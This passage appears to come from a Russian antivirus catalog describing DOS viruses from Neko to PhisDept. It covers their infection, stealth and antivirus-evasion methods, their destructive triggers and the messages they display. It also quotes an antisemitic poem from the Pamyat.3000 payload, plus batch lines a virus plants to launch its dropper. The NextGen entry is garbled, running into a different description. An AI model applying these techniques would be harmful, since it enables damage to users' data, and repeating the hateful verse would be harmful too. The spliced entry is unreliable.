Neko.2697

Резидентный полиморфный вирус. Отличается оригинальным алгоритмом шифрования. Помимо простого шифровщика вирус создает код, который в случайных местах уже зашифрованного вирусного кода изменяет некоторые байты и слова (XOR, ADD, SUB, INC, DEC, AND). Во вторник перед заражением файла выводит текст:
Dear Mrs.Grandy:
Aloha!
It is me,Neko again! This is the lastest version 2.0
Undoubtedly,I am not what I was.
Let me tell you something about my improvement.
I work with the Antilogic Engine I.
It is a new invention.So,
Showtime! Neko version 2.0
Made by Metal Satan

Nessuno.2170

Опасный резидентный полиморфный вирус. Разрушает, записывая в случайное место файла 21 случайный байт, файлы, расширения которых заканчиваются на буквы, указанные в следующем списке (2 последовательных символа для каждого файла): ocxtas.cppodroorsmspldakrgbfpsiprj. Содержит текст "[For pirates... ©1993-94 nessuno] sono solo stronzate".

Net.4340

Опасный резидентный вирус. Может записывать в программы троянский код, уничтожающий CMOS и сектора дисков. Содержит текст "Retix PC-21 NETBIOS".

Neurobasher.Alpha

Неопасный резидентный стелс-вирус. При старте или открытии зараженных файлов вирус удаляет свой код из них.

Neurobasher.Avalanche

Опасный резидентный шифрованный вирус. При старте файлов, содержащих словосочетания F-PR, TBAV, SCAN, MSAV, CPAV, TBME, TBFI, TBSC, VIRS, TBDR, вирус удаляет их. Содержит текст "AVALANCHE/Germany '94...Metal Junkie greets Neurobasher".

Neurobasher.Havoc (1,2)

Файлово-загрузочные полиморфные стелс-вирусы. Заражают MBR, Boot-сектора дискет и EXE-файлы. При старте зараженной программы вирусы первым делом устанавливает свою TSR-копию в память по адресу 7C00:0000, перехватывают INT 13h и INT 21h, причем при "захвате" INT 21h, вирусы могут внедрить инструкции перехода на свой обработчик в оригинальный обработчик прерывания DOS, находящийся в HMA. После этого заражают MBR "винчестера", шифруют истинный "спрятанный" в 7 секторе MBR и Boot-сектор активного раздела DOS. 9 секторов своего тела вирусы записывают начиная с 8 сектора жесткого диска. При загрузке с инфицированного жесткого диска вирусы устанавливают в память по адресу 7C00:0000 свой код, перехватывают INT 13h, INT 21h, ждут загрузки DOS, и "законным" способом (f.48h INT 21h) получают свой участок памяти. При возможности размещают себя в область UMB. Заражают дискеты емкостью 1.2M или 1.44M. Причем вирусы форматируют дополнительную 81 дорожку из 10 секторов, куда "прячут" оригинальный Boot-сектор и 9 секторов своего кода. Havoc (1) содержит ошибку в процедуре заражения Boot-секторов дискет. Правильное заражение флоппи-дисков будет происходить только в том случае, если первая команда загрузчика JMP SHORT PTR (EBh ??). Во второй модификации вируса данная ошибка исправлена.

Neurobasher.N8Fall.527

Неопасный резидентный стелс-вирус-спутник. Не заражает файлы, содержащие символы "F-" (F-PROT). Содержит текстовую строку "-A-VICTORY-THAT-WON'T-LAST-"

Neurobasher.N8Fall.4518 (1,2), 5770, 5081

Неопасные резидентные полиморфные стелс-вирусы. Устанавливают свою TSR- копию в область UMB или в верхние адреса памяти. Внедряют прямой межсегментный CALL на свой код в оригинальный обработчик DOS INT 21h. Neurobasher.N8Fall.4518 (1,2) иногда вызывает печать экрана на принтер (Int 05). Neurobasher.N8Fall.5770,5081 при завершении работы какой-либо программы (f.4Ch INT 21h) может установить в память "на INT 21h" другой стелс-вирус-спутник Neurobasher.N8Fall.527, хранящийся в теле вируса- родителя в зашифрованном виде, который в дальнейшем может "жить собственной жизнью".

Neurobasher.Tremor

Неопасный резидентный полиморфный стелс-вирус. Трассирует INT 21h. Копирует свою TSR-копию в область UMB, если это возможно. Перехватывает INT 15h, 21h, причем может не просто перехватить INT 21h, а "вклиниться" в цепочку обработчиков INT 21h. И сам перехват INT 21h и 15h довольно необычен: вирус находит в памяти PSP (префикс программного сегмента) резидентной части командного процессора и оставляет в нем по смещению 5 и 53h прямые межсегментные jump'ы соответственно на свои обработчики INT 21h, 15h. И делает ссылки векторов в таблице прерываний или значения адресов межсегментных переходов на установленные им инструкции переходов в PSP COMMAND.COM. INT 15h вирус использует для вызова видеоэффекта.Также, в некоторые моменты, вирус может "потрясти' экран.

Nexivder.4224, 4286

Неопасные файлово-загрузочные полиморфные вирусы. Заражают MBR жесткого диска, загрузочные сектора дискет и COM-файлы. В COM-файлы вирусы внедряются в середину файлов, используя трассировку для замены по случайному смещению программы определенной вирусом программной инструкции на вирусную команду передачи управления (CALL NEAR).Основной зашифрованный вирусный код размещается в конце файлов.

NextGen.2304

Неопасный резидентный стелс-вирус. Содержит текст "The NextGen Stealth Virus 6 секторов на 13 головках жесткого диска. Заражают файлы, записывая в их конец, перед основным вирусным кодом блок до 256 байт и после тела вируса, для EXE-файлов - блок до 256 байт, для COM-файлов - блок до 512 байт. С вероятностью 1/256 уничтожают программные файлы, записывая в них код, который при старте выводит следующее сообщение:
Ninja.1336: DZINA VIRUS v 4.0 Copyright © 1990,91,97 Dzina Corp

Ninja.1376:

Mutant Ninja Version 2.0 Copyright © 1990,91 Virus&Worm Software

Nki.3477

Опасный резидентный вирус. При создании файлов с расширениями AS? или DB?, вирус может удалить их или создать вместо файла директорий с таким же именем. При нахождении в левом верхнем углу экрана буквосочетания "AX", вирус подставляет вместо вызванной функции INT 21h функцию удаления файла (f.40h Int 21h). Иногда выводит текст "No Viruses" и рисует на экране диагональные черно-белые полосы.Содержит зашифрованный текст "Николаевский Кораблестроительный институт. Oct(123,123,126) by one of student".

Nocopy.3695

Неопасный резидентный шифрованный вирус. Заражает EXE-файлы при их старте или при обращении к ним. Создает файл C:\NOCOPY.COM, содержащий вирусный код и вставляет строку C:\NOCOPY в начало файла AUTOEXEC.BAT. Корректирует MBR жесткого диска таким образом, чтобы после загрузки системы вирус смог бы узнать адрес INT 13h в ПЗУ.

NoDBF.1000

Опасный резидентный вирус. Блокирует обращение к файлам *.DBF.

NoGraph.784

Опасный резидентный вирус. Может запретить графический режим монитора. Возможен вывод случайных символов на экран, зависание или перезагрузка системы, изменение контрольной суммы CMOS-памяти.

Noki.448

Опасный резидентный вирус. Записывает свой код в 17 сектор жесткого диска, записывает 39 байт своего кода в область векторов прерываний по адресу 0:210h, "перехватывает" INT 21h. При старте файлов (f.4Bh Int 21h) вирус считывает 17 сектор, содержащий вирусный код в область видеопамяти BD00:0000, проверяет является ли запускаемая программа EXE- файлом и считывает 448 байт из области стека данной программы в память. Если данные 448 байт состоят из нулевых байт, то вирус записывает свой код в данное место программного стека, не изменяя длины пораженного файла. 23 числа нечетного месяца вирус уничтожает MBR жесткого диска. Вирус содержит строку "NOKI", которая выполняется как инструкции процессора.

Nomenklatura.1024

Неопасный резидентный вирус. Содержит тексты "Nomenklatura', "Този дебел идиоІ вме±Іо да ¶еліне ±о·ниІе і±Іни на моми·еІо, впи і±Іни Іам, кєдеІо І°їбваёе да ±ложи ±єв±ем д°іго не№о".

Noon.1163

Неопасный резидентный вирус. В 12.00 имитирует сигналы точного времени радиопрограммы "Маяк". Содержит зашифрованный текст "byMH&MHsoftware".

NoRemorse.1319

Опасный нерезидентный шифрованный вирус. COM-файлы заражает, внедряя свой код в начало файлов. EXE-файлы заражает, как вирус-спутник, присваивает оригинальному EXE-файлу расширение WIT и создает вирусный файл с именем и расширением исходного файла. В EXE-файлы, имеющие расширение COM (кроме файла CO*.COM), вирус записывает троянский код, который выводит сообщение "ЫІ±°±ІЫ NO REGRET ЫІ±°±ІЫ" и "вешает" систему. 15 апреля или 50-ое поколение вируса уничтожает содержимое CMOS - памяти, выводит текст "Корабелка - rulez forever !" и "перезагружает" систему. Уничтожает файлы: *.°*,chklist.*,anti-vir.dat, msav.chk, *.avb, *.log, tbscan.sig, smartchk.cps, *.ms. Содержит текст "Virus NoRemorse v1.8. Copyright © by Wit 1996.".

November 17.768

Очень опасный резидентный вирус. В ноябре после 17 числа уничтожает содержимое 8 первых секторов текущего диска.

Npuxogum.1176, 2025, 2036

Неопасные резидентные вирусы. 1 апреля производят вывод на экран некоторой графической шутки.

NRLG.based

Данные вирусы сконструированы с помощью вирусного конструктора NRLG (NuKE RANDOMIC LIFE GENERATOR), позволяющего создавать резидентные полиморфные вирусы, заражающие COM-файлы. А также позволяют задавать наличие в вирусах всевозможных текстовых строк, видеоэффектов и деструктивных функций.

Nsd.266

Неопасный нерезидентный вирус. Иногда выводит текст "SYSTEM ERROR: DMA DENIED." и, как правило, "вешает" систему. Также имеется строка "NSD".

Nsi.1509

Очень опасный резидентный вирус. Уничтожает *.PA? - файлы. Содержит тексты "I'm sorry", "In & For NSI", "Nikolaev".

NTU.Cawber

Неопасный резидентный шифрованный вирус. Содержит тексты:
T4
Griffe
T4 virion ДДДДД by NTU BACTERIOPHAGE LAB
There Once Was A King, Who Called For The Spring
For His World Was Still Covered In Snow
But The Spring Had Not Been, For He Was Wicked And Mean ...
Here I'm Sitting And It's Getting Cold
The Morning Rains Against My Window Pane
While The World Looks So Cold And Grey
In My Mind I Dream Away
Then I'm On My Way To Tropic Islands
You'd Always Say I Was A Dreamer
You Were Right
What Do I Say When It's All Over ?
And SORRY Seems To Be The Hardest Word ...

NTU.L'amour

Опасный резидентный полиморфный стелс-вирус. 13 сентября уничтожает содержимое CMOS-памяти и секторов жесткого диска. Содержит текст "L'AMOUR v1.1 by NTU BACTERIOPHAGE LAB S/N TM1-", далее идет номер поколения вируса.

NuKE.Pox.609

Опасный резидентный шифрованный вирус. 24 числа при нажатии на клавишу Del вирус форматирует 32 цилиндра жесткого диска. Содержит текст "© Rock Steady/NuKE".

Nuker.Trance.1688, 1982

Nuker.Trance.1982 - опасный вирус. Иногда может записать в случайный сектор диска строку "This sector has been fucked up courtesy of Tranceэ Virus © 1995 by The Nuker". Nuker.Trance.1688 1-го числа производит "осыпание" экрана (см. Cascade.1701), содержит строку "Trance Virus © 1995 by The Nuker".

Nutcracker.512 (1,2)

Опасные загрузочные вирусы. Шифруют первый сектор подкаталогов (см. Nutcracker.AB2.6425).

Nutcracker.AB3

Опасный резидентный вирус. 12 января и 23 июля уничтожает по 40 секторов логических дисков C:, D:, E:, F:, G:. Запоминает в своем теле дату старта вируса и через 23 дня замедляет вывод на экран, "перехватывает" INT 10h (вывод на экран) и производит холостой цикл. Содержит текст "Nutcracker(AB3)".

Nutcracker.AB4

Очень опасный резидентный вирус. Записывает в MBR жесткого диска "троянский" код, который 12 января и 23 июля форматирует первые дорожки первого и второго жесткого дисков. Также при старте любой программы, резидентная копия вируса увеличивает счетчик, находящийся в загрузочном секторе текущего диска по смещению 10.При достижении счетчиком значения 64, вирус обнуляет его и создает на данном логическом диске псевдосбойный кластер. Содержит текст "Sombre Nutcracker(AB4).

Nutcracker.AB5.2725, 2900, 3139

Очень опасные резидентные вирусы. Пытаются быть невидимыми. При каждой 16 стартующей программы уничтожают один случайный сектор на текущем диске. Уничтожают файлы с расширениями *.MS и *.?AS и таблицы ревизора диска ADinf. Не заражают файлы с именами, начинающимися на IB и CO. Записывает в MBR жесткого диска "троянский" код, который после 512 загрузок с жесткого диска может уничтожить информацию на жестком диске и в CMOS-памяти.

Nutcracker.AB6 (1-4)

Очень опасные резидентные файлово-загрузочные вирусы.12 января пытаются отформатировать первый жесткий диск,после чего выводят на экран тексты:
Nutcracker.AB6 (1) - "Dreary Nutcracker(AB6)"
Nutcracker.AB6 (2) - "Dreary Nutcracker(AB6) Lives"
Nutcracker.AB6 (3) - "Dreary Nutcracker(AB6) Lives Again"
Nutcracker.AB6 (4) - "Dreary Nutcracker(AB6) lives forever !".
Иногда изменяют символы, выводимые на печать, либо совсем блокируют вывод на принтер. Удаляют файлы, имеющие расширения FW, ?AS и MS (в последнем варианте вирус содержит ошибку). Содержат зашифрованный текст "Любовь Н.".

Nutcracker.AB7 (1,2)

Неопасные резидентные файлово-загрузочные вирусы. Заражают MBR жесткого диска, загрузочные сектора дискет и EXE-файлы, при их создании. EXE- файлы заражаются, если их длина не более 64K. Вирусы переводят их в формат COM-файла, внедряя в начало заголовка JUMP на свое тело и в дальнейшем самостоятельно настраивая адреса таблицы перемещаемых символов. При загрузке с инфицированного диска вирусы оставляет свою копию резидентно в памяти (по возможности в области UMB) и перехватывают INT 9,13h,15h,21h,2Fh,40h. При нажатии на Ctrl-Alt-Del вирусы проверяют наличие своего кода в MBR и заражают его. При вызове функции AH=13h INT 2Fh (получить адрес дискового драйвера) вирусы самостоятельно удаляют себя из MBR. 12 числа нечетного месяца при загрузке системы выводят сообщение "I'm Nutcracker(AB7)!", ждут нажатия на клавишу и продолжают загрузку системы.

Nutcracker.Info.2133, 2142, 2259

Неопасные резидентные вирусы-черви. При старте инфицированной программы вирусы выводят тексты:
Nutcracker.Info.2133:
InfoSystem version1.02
Reading System Information...
Computer type: IBM PC
Nutcracker.Info.2142:
-*- INFOSYSTEM -*-
version 1.04
© 1995 by Ziff Co.
Reading System Information...
Computer type: IBM PC
Nutcracker.Info.2259:
Reading System Information...
Computer type: IBM PC
после этого вирусы проверяют тип компьютера и печатают одну из следующих строк: "Original", "XT", "AT", "Convertible", "PS/2","Junior" или "Unknown". Далее выводится текст:
Checking HDD controller...
SCSI controller type: Unknown (Error14)
и производится заражение системы. Вирус создает в каталогах, отмеченных через переменную "PATH", файл INFO.COM (или INFOSYS.COM), содержащий вирусный код. Затем он (вирус) производит поиск *.BAT-файлов и записывает в их начало команды:
@if not exist info.com goto noinfo
@info>nul
:noinfo
или:
@if not exist infosys.com goto noinfo
@infosys>nul
:noinfo
При запуске такого BAT-файла производится запуск файла INFO.COM (или INFOSYS.COM) и, следовательно, управление получает вирусный код. Этот вирусный код размещает свою резидентную копию в памяти и "перехватывает" INT 1Ch и INT 21h. При попытке доступа к измененным вирусами BAT-файлам вирусы включают свои стелс-процедуры. При запуске программ CHKDSK, WEB или DRWEB вирусы отключают свои стелс-режимы

0

15

O

OhLaLa.1895

Неопасный нерезидентный вирус. Удаляет файлы *.MS, *VIR.DAT. До 13 числа месяца проигрывает мелодию и выводит на экран текст:
Ohhhh La La!
Mommmmy, they're teasing me again
Shut up you little sonsuvbitches

OkYes.1257

Очень опасный нерезидентный вирус. Может уничтожить информацию всех дорожках первой головки жесткого диска. Очень низка вероятность вывода на экран символов "!" вместе со звуковым сигналом. Свое название получил за вызов INT 11h со словом "Ok? " в регистрах AX, BX и ожиданием ответного слова в тех же регистрах "Yes." (?).

OldYankee.1961

После заражения EXE-файла исполняет мелодию "Yankee Doodle".Имеет строку "motherfucker".

OldYankee.Bandit

Опасный нерезидентный вирус. В понедельник пытается отформатировать нулевую дорожку дискеты в третьем флоппи-дисководе. Содержит текст "!!PCBANDIT!!".

Olenka.6144

Неопасный резидентный вирус. Устанавливает свою резидентную копию в верхних адресах памяти, "отрезая" при этом от памяти DOS 12K (адрес 0:413h). При попытке какой-либо программы остаться в памяти резидентно, вирус освобождает ранее занятую область памяти и копирует свой код в память, расположенную непосредственно за кодом программы, пытающейся остаться резидентно. Для выполнения данной операции вирус увеличивает величину запрашиваемого участка памяти на размер собственного кода. 26 апреля вирус выводит на экран текст "Demo !". Свое название получил за засылку в некоторые регистры фразы "Оленька!".

Olga.4448

Опасный резидентный вирус. В октябре уничтожает содержимое первых секторов текущего физического диска и в это время выводит текст:
Раз на вокзале я девушку встретил Не знаю, что в ней мне приглянулось,
Она очень сильно понравилась мне, Но эти глаза меня завлекли.
А позже в вагоне ее я приметил, Во мне словно что-то проснулось ...
Сидела та дальше, на другой стороне. О, как быстро часы те прошли !
Потом оказалось, что едим мы вместе, В общении я был для нее как наставник,
О, как чудно то было узнать ! За старшего могла меня она звать.
И вот - очутившись на месте, И выглядел я точно забавник,
Я старался ее во всем поддержать. Который мог все и вся попирать.
Как сильно все время старался Но тут его величество случай
Ее хоть не много, но выше поднять. Ее вдруг к вершинам вознес.
Как сильно тогда я сам принижался, И я ей сказал, что над горною кручей,
И все для того ,что бы равными стать. Любовь в своем сердце я нес.
О! Как сильно тогда я боялся, И тогда, униженья так сильно боясь,
Что стараясь принизить себя, Я солгал, я солгал, но всего один раз.
Я не только с ней поровнялся, И соврал лишь к признанью стремясь,
Но и ниже вдруг стану мгновенье спустя. Но не был услышан негромкий мой глас.
О, боже насколько она изменилась, Я знал, что придет час прощанья,
Как сильно себя она подняла! Ведь насквозь ее видеть я мог.
И за нос меня поводить вдруг решилась, И вот услыхал от нее - до свиданья,
Про это не скажешь то слово - "Любя". И другом остаться к тому же зарок.
Мне больно! И она это знала. Не смейся ты, дураком меня называя.
Она знала, что я ее полюбил. О нет! Не буду один я страдать!
И хоть отказ этот тихий мне дала, И в помощь искуство свое призывая,
Я душу свою уже отравил. Хочу хоть частицу тебе передать.
Я вкладываю всю черную часть души своей,
В то мастерство простое,
Которое представит участи моей,
Народу множество большое.

И что бы участь эта слаще была,
Я нарекаю демона именем ее.
И знак который та носила,
Означит действие сие.
И так, его назвал я Ольга, Спасибо друг, что отхлебнул из чаши.
И здесь он уничтожил все. То не проблема, не скисай!
От бывшего остался стих сей только. Мы совместили боли наши ...
О, не старайся, не поймать тебе ее. Но мне кажись пора. Прощай!

Omega.440

Опасный нерезидентный вирус. В пятницу 13 числа уничтожает содержимое первых секторов первого жесткого диска.

OneHalf.3544 (1-7), 3570, 3577, 3666

Очень опасные полиморфные файлово-загрузочные стелс-вирусы. Используют алгоритм заражения, похожий на алгоритм CommanderBomber. Но помимо того, что "усеивают пятнами" своего кода (10 "пятен" по 10 байт) инфицированный файл, производят шифрование основного тела вируса, расположенного в конце файла. При первом запуске инфицированного файла, заражают MBR "винчестера". Оригинальный MBR и 7 секторов своего тела "прячут" в последних секторах 0 цилиндра жесткого диска. При перезагрузке компьютера, "отрезают" от доступной DOS памяти 4K, считывают в "отрезанную" верхнюю область памяти свое продолжение - 7 секторов, и перехватывают INT 13h и INT 1Ch. Контролируют с помощью INT 1Ch установку DOS'овского INT 21h, и перехватывают его. При каждой перезагрузке системы с жесткого диска последовательно, начиная с последних цилиндров, шифруют все сектора двух цилиндров на каждой головке диска. Когда вирусы находятся в памяти, они контролируют чтение секторов данных цилиндров и расшифровывают их. Если же вирусы будут удалены из MBR и памяти, то восстановление зашифрованных секторов окажется невозможным. При зашифровывании половины диска вирусы выводят на экран фразу:
Dis is one half.
Press any key to continue ...
OneHalf.3544 (3) выводит текст:
Dis is TWO HALF.
Fucks any key to Goping...
OneHalf.3544 (4):
HET - фu3uke u ucTopuu B pacnucaHuu uy7 !
OneHalf.3544 (5):
Disk is Tpu half.
(Bepx, Hu3 u Pe6po)
OneHalf.3544 (6):
Dis is 3 HALF !.
Fucks any key to LoHing...
OneHalf.3544 (7):
A cup of Beer ?.
See you later...
После этого ожидают нажатия на любую клавишу. После чего продолжают свою дальнейшую инсталляцию в память. При попытке трассировки резидентной части вируса, предпринимают некоторые простые, но действенные меры "завешивания" системы. Содержат текстовые строки "Did you leave the room?" или "DidYouLeaveTheRoom?". OneHalf.3544 (3) имеет текст "User is loh !". Не заражают файлы с именами SCAN,CLEAN,FINDVIRU, GUARD,NOD,VSAFE,MSAV,CHKDSK,AIDS,ADINF,WEB. Вирусы OneHalf.3544 (4,5) не зашифровывают диск. OneHalf.3544 (4) содержит тексты "Copyright© by Automatic Integerated Digital Software", "3TO - HE Bupyc, cynepxakep Ara6ekoB !", "CugopeHKOB - gypak !!!". OneHalf.3544 (6) имеет текст "WEB - LOH !!!", Onehalf.3666 - "Hail to the GREAT OneHalf's author!". OneHalf.3544 (7): "Doyou want to Drink ?".

Oops.600

Опасный резидентный вирус. Заражает файлы только начиная с июня. После установки своей TSR-копии или при старте программ, оканчивающихся на ST, NF, -V, вирус выводит сообщение "Bad command or file name". В воскресенье переименовывает C:\COMMAND.COM в C:\COMMAND.BAD и выводит текст:
ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ
ЫЫ Oops! Sorry for BAD virus! ЫЫ
ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ

OS2.Arelocs

Неопасный нерезидентный вирус, заражающий *.EXE и *.DLL - файлы в формате NewExe (NE), принадлежащие OS/2. Данный вирус находит в заголовке NE точку входа на кодовый сегмент, "сдвигает" все остальные сегменты в конец файла, увеличивает размер стартового кодового сегмента на размер вируса, записывает себя в освободившееся место и корректирует заголовок NE. Это первый известный вирус для OS/2, "корректно и правильно" заражающий NewExe (NE) файлы. Вирус содержит текст "© 1995 American Eagle Publications Inc., All rights reserved.".

OS2.First

Опасный нерезидентный, перезаписывающий (overwritting) программный код, вирус. Заражает *.EXE - файлы в формате NewExe (LX) (файлы для OS/2). Вирус выводит на экран сообщения:

My name is
--> infected

OS2.Jiskefet

Неопасный нерезидентный вирус. Заражает *.EXE- файлы для OS/2. Вирус читает 2048 байт заголовка файла-жертвы, записывает их в конец файла, а в начало файла записывает 2048 байт своего вирусного кода. Вирус имеет тексты "Jiskefet", "MK".

Otti.937

Опасный резидентный шифрованный вирус. 14 и 18 числа месяца уничтожает MBR первого жесткого диска. Имеет строку "OTTI FOREVER".

Ox.475

Неопасный резидентный полиморфный вирус. Использует один из 4 вариантов расшифровщиков своего кода.

Oxana.747, 818, 819

Неопасные резидентные вирусы. Не заражают программы, содержащие строки Oxana.747, 818: "Web" или "ADi", Oxana.819: "viru" или "виру". Содержат тексты "Оксана v.4.8", "Оксана v.4.5CRYPT" или "Оксана v.4.D".

0

16

P

Palma

Неопасный загрузочный стелс-вирус. При заражении MBR жесткого диска использует прямое программирование контроллера жесткого диска. Содержит текст "Palma5.".

Pamyat.2000 (1-5)

Неопасные нерезидентные шифрованные вирусы. При обнаружении в окружении программы (ENVIRONMENT) строки "OBSHCHESTVO="Память"" вирусы выводят текст:
ВНИМАНИЕ ! ! ! Эта программа заражена моим вирусом !
Во избежание недоразумений система завешена.

1 декабря выводят текст:

Я люблю Таню !
Поздравляю её с днем рождения !
или:
Сей вирус посвящен Тане.
Поздравляю её с днём рождения !
Таня, я люблю тебя !!!
или:
Сей безобидный вирус посвящён Тане.
Поздравляю её с днём рождения !
Таня, я очень люблю тебя !!!
В сентябре Pamyat.2000 (3) выводит текст:
Сия программа заражена вирусом.
Покупайте AIDSTEST !
Pamyat.2000 (5) по средам в ноябре выводит текст:
Радуйтесь, люди: скоро у Тани будет день рождения.
После 1 сентября в понедельник также может быть выведен текст:
Два Рима пали, третий есть, а четвертому - не быть !
Содержат в своем теле строку "Новосибирск, 6 - 8 - 1996. Version 3b"
или "Новосибирск, 17-10-1996. Version 3d", или "Новосибирск,
8-11-1996. Версия 3e.".

Pamyat.3000 (1,2)

Очень опасные нерезидентные шифрованные вирусы. При обнаружении в окружении программы (ENVIRONMENT) строки "OBSHCHESTVO="Память"" вирусы выводят текст:
ВНИМАНИЕ ! ! ! Сия программа заражена моим вирусом !
Во избежание недоразумений система завешена.
"Обрезают" файлы форматов NewExe (NE) и PortableExe (PE) до 1024 байт и в DOS-заголовок этих файлов вирусы записывают код, выводящий на экран текст "This program must be run under OS/2.". В файл DRWEB.EXE вирусы записывают код, завершающий работу программы. 1 декабря выводят текст:
Очередной вариант сего безобидного вируса снова посвящён Тане.
Таня, поздравляю тебя с днём рождения !
Таня, я очень люблю тебя !!!
3 апреля - следующий текст:
Мы проклинаем в ответ непотребное племя евреев,
Что над собою творит гнусный, бесстыдный обряд,
Глупых теорий источник, с холодной субботой на сердце -
Сердце ж ещё холодней самой религии их.
Каждый седьмой они день пребывают в позорном бездельи -
Вялый, ленивый их Бог в этом им деле пример.
Прочие выдумки их - лишь рабов легковерных утеха:
Умный ребёнок - и тот им бы поверить не мог.
Пусть бы несущее ужас оружье Помпея и Тита
Не покоряло совсем нам иудейской страны!
Вырвав из почвы, заразу по белому свету пустили -
И победитель с тех пор стонет под игом раба.
Рутилий Намациан
"De reditu suo"
Содержат текст "Новосибирск, 31-03-1997. Версия 3f.".

Panda.1062, 1070

Неопасные нерезидентные шифрованные вирусы. В воскресенье пытаются вылечить инфицированные файлы. Panda.1070 содержит текст "Hi!PD".

Pande.1516, 1520, 1532

Неопасные резидентные стелс-вирусы. По возможности устанавливают свои резидентные копии в область UMB. При запуске программ из списка (по 2 буквы на имя) F-TBARRALHPKCH отключают свои стелс-процедуры. Содержат тексты "pandemonium by retch", "17/04/96".

Parity (1-3)

Неопасные Boot-вирусы. Иногда выводят на экран сообщение "PARITY CHECK" и "вешают" систему. Переживают "теплую" перезагрузку (Ctrl-Alt-Del).

Paulus.1804

Опасный резидентный вирус. Может изменять на экране монитора большие буквы на маленькие, а также при нажатии на Ctrl-Alt-Del может вывести текст "Paulus de DOSkabouter lives here..." и "завесить" систему. Имеет текст "© MeThOxY 1996".

PeaceKeeper.3820

Опасный резидентный полиморфный вирус. Заражает COM и EXE-файлы. В COM- файлы вирус внедряется по методу вируса CommanderBomber. Иногда вирус может уничтожить boot-сектор диска A:, записав в область загрузчика код, который выводит на экран текст:
Peace-Keeper Virus V2.10
Written by Doctor Revenge 18-May-1994 , Italy
и "вешает" систему. Также вирус содержит тексты "[MCG v0.31с]" и "SCCLVIVSMSCPF-IMVHTB". Вирус не заражает файлы, содержащие первые 2 буквы, указанные в последней строке.

Peach.887

Резидентный вирус. Уничтожает файлы CHKLIST.CPS. Иногда записывает текстовую строку "Roy CuatroNo 2 Peach GardenMeyer Rd. Spore 1543" по адресу 0040:00FC.

Peel.334

Опасный нерезидентный вирус. При неаккуратной трассировке уничтожает содержимое 720 секторов диска C:. Периодически устанавливает признак неактивного (незагружаемого) раздела для первого логического диска в таблице разделов (partition table), в MBR.

Pest.2743

Опасный резидентный полиморфный вирус. 13 числа может уничтожить 256 секторов первого жесткого диска. Содержит текстовые строки "Pest © 12/10/93 by (and best wishes from) PRIEST Int., Gbw/Germany", "ASCECLHVSPF-ACPRVINWI".

Phalcon.894

Опасный нерезидентный вирус. В марте форматирует случайные диски. По понедельникам оставляет в памяти "на таймере" (INT 08) резидентный код, который постоянно вызывает INT 1Ah (получение системного времени).

Phalcon.BobRoss.1110, 1117 (1,2), 1133

Неопасные нерезидентные вирусы. 9 июля оставляют в памяти резидентный код, который примерно через 4.5 часа выводит в верхнем левом углу экрана поочередно тексты:
Bob Ross lives!
Bob Ross is watching!
Maybe he lives here...
What a happy little cloud!
Maybe he has a neighbour right here...
You can make up stories as you go along.
или Phalcon.BobRoss.1117 (2):
DR.LOH ! lives!
Don`t the PANIC !!!!!
WEB is LOH & Penis...
Please WAIT! HDD format WAIT!!!
MikeMutationEngine ©MikeHacker
(DR.LOH is best of the best VIRUS !!!!!!
В теле вирусов также имеется текст "PHALCON".

Phalcon.Dcool

Неопасный нерезидентный вирус. Оставляет в памяти резидентный код, который выводит следующий текст:
SHALOMKnock... Guess who's There...
Fuck Asi Azulay and Lior Cohen ...
It's Dr. Unknown... :-)
Fuck Guy Assado for Distributing my Sources...
Use XOPEN, MAN!!! FUCK Stick-Buster!!!
ViSiON-X is Some C00L Program !!!
Call to Support board: +972-X-XXXXXX !!!
TNTVIRUS is SHIT!!! Cpav is SHIT!!! Use McAfee!
But... McAfee is SHIT too...
Borland is the BEST...
Too bad, you didn't make Backup for your HD... :)
I Wonder, What INT 13h Does with AH=05...
Just kiddin'... Ya know?
GUY ASSADO IS MONGOL!!!
COOLNESS is FOREVER!!!
Также содержит строку "D-C00L-1 ViRUS".

Phalcon.Maria

Опасный нерезидентный вирус. 2 числа месяца уничтожает случайные сектора диска. Оставляет в памяти резидентный код, который выводит текст:
Maria K lives..
Somewhere in my heart..
Somewhere in Sweden..
I might be insane..
But the society to blame..
The Unforgiven / Immortal Riot

Phalcon.Psychosis

Неопасный нерезидентный вирус. 6 июня оставляет в памяти резидентный код, который через 5 минут выводит текст:
Another year passed by
Another tear the willows cry
to change the world we ever try
to make a difference before we die
[PSYCHOSIS] Greets, Phalcon/Skism.
© 93/94 The Unforgiven / Immortal Riot
Содержит также текстовую строку:
\\ Merry Xmas and a happy new year // Sweden - Snowing Again

Phantom1.7000 (1-4), 7100, 7160

Полиморфики. Если около 20 минут не было нажатий на клавиши выводят следующую картинку.
Затем на фоне надписи "PHANTOM 1" появляется бегущая строка "Congradulations!!! Your computer is now infected with a high performance PHANTOM virus! Coming soon: next virii based on the _C00LEST_ mutation engine all over the world: the Advanced Polymorphic Engine! Enjoy this intro! © 1994 by Dark Prince.".

Phardera.5824

Hеопасный резидентный полиморфный вирус. 10 числа каждого месяца выводит текст "Phardera + Dianita". Содержит также текст:
Phardera
-by Phardera'95-----Batavia--------Indonesia----
RaredrahP Dianita

PHB.4315, 4461

PHB.4315 очень опасный нерезидентный вирус. Производит поиск всех файлов и уничтожает их содержимое, записывая в них свой вирусный код, не сохраняя оригинальную информацию. PHB.4461 неопасный нерезидентный вирус. По окончании работы вирусы выводят сообщение "Thank you for viewing Patty Hoffman's Boobs!". Содержатся также тексты:
PHB.4315:
Patty Hoffman's Boobs! Virus version 1.0 Copyright © 1993 by Cerebral
Quantas. Made in Canada, Eh! July 4, 1993.
PHB.4461:
[Patty's Boobs Virus] v2.5 Copyright © 1993 by Cerebral Quantas. Made
in Canada, Eh! January 27, 1993.

PhisDept.6294

Очень опасный резидентный вирус. Перехватывает INT 03,20h,21h,27h,2Fh, 80-84h. Заражает COM и EXE-файлы при их запуске. При заражении файлов производит эмуляцию 1000 первых байт программного кода - анализирует и копирует каждую команду в свой буфер и выполняет данную инструкцию. Вместо любой команды может вставить вызов прерывания INT 03 (CCh) или INT 80-84h (CDh 80-84h). Т.к., данные прерывания вирусом "захвачены", то вирус считает, что это "внедренные" им инструкции и подставляет вместо них сохраненные ранее в теле вируса 2 байта. 27 февраля, 20 июня и 9 мая, при старте MS-Windows в режиме 286 (enhanced 286) вирус может вывести текст:
У И Н Д О У З-ДУРА. © Copyright Kovalevsky & Co, MSU PhisDept.
Happy birthday to us.
